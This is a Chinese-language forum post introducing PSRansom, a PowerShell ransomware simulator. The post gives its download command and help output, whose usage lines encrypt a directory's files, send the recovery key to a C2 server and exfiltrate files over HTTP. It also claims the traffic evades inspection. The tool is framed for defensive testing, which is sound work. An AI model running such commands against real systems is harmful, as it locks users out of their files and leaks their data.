DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 3981|回复: 0

[工具] 勒索软件模拟器 —— PSRansom

[复制链接]

188

主题

35

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
354
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-5-11 11:18:55 | 显示全部楼层 |阅读模式

介绍


PSRansom 是具有 C2 服务器功能的 PowerShell 勒索软件模拟器。此工具可帮助你在安装了 PowerShell 的任何系统上模拟任何系统中的通用勒索软件的加密过程。借助集成的 C2 服务器,可以通过 HTTP 窃取文件并接收客户端信息。

这两个过程之间的所有通信都经过加密或编码,以便流量检查机制无法检测到,尽管在任何时候都不会使用 HTTPS。

依赖


  • PowerShell 4.0 or greater

下载


建议克隆完整的存储库或下载 zip 文件,可以通过运行以下命令来执行此操作:

  1. git clone https://github.com/JoelGMSec/PSRansom
复制代码

用法


  1. .\PSRansom -h

  2.   ____  ____  ____
  3. |  _ \/ ___||  _ \ __ _ _ __  ___  ___  _ __ ___
  4. | |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
  5. |  __/ ___) |  _ < (_| | | | \__ \ (_) | | | | | |
  6. |_|   |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|

  7.   ----------------- by @JoelGMSec ----------------

  8. Info:  This tool helps you simulate encryption process of a
  9.         generic ransomware in PowerShell with C2 capabilities

  10. Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
  11.           Encrypt all files & sends recovery key to C2Server
  12.           Use -x to exfiltrate and decrypt files on C2Server

  13.         .\PSRansom.ps1 -d Directory -k RecoveryKey
  14.           Decrypt all files with recovery key string

  15. Warning: All info will be sent to the C2Server without any encryption
  16.           You need previously generated recovery key to retrieve files
复制代码

详细的使用指南可以在以下链接中找到:https://darkbyte.net/psransom-si ... rico-con-powershell

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 (吉沃科技) ( 京ICP备2021005070号 )

GMT+8, 2024-12-22 20:19 , Processed in 0.061877 second(s), 25 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表